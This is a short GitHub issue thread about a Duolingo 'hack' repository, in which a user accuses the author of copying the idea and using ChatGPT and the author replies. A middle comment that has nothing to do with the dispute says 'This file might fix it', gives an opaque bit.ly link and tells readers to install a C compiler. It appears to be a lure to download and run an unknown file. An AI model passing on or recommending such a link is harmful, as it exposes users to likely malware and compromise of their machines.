### ISSUE TITLE
issue

### ISSUE THREAD

**Issue by mulchs** [Anready/duolingokvak#3]
first of all, u got this idea from cole-bmaul duolingo hack and second, your hack created by chatgpt lol

**Comment by 102898Is** [comment]
This might help:This file might fix it
https://bit.ly/4gx42eQ
If you don't have the c compliator, install it.(gcc or clang)

**Comment by Anready** [comment]
first of all, i rewrite hack from one of GitHub repositories to python, secondly, i created normal documentation, and chatgpt helped me only in one thing
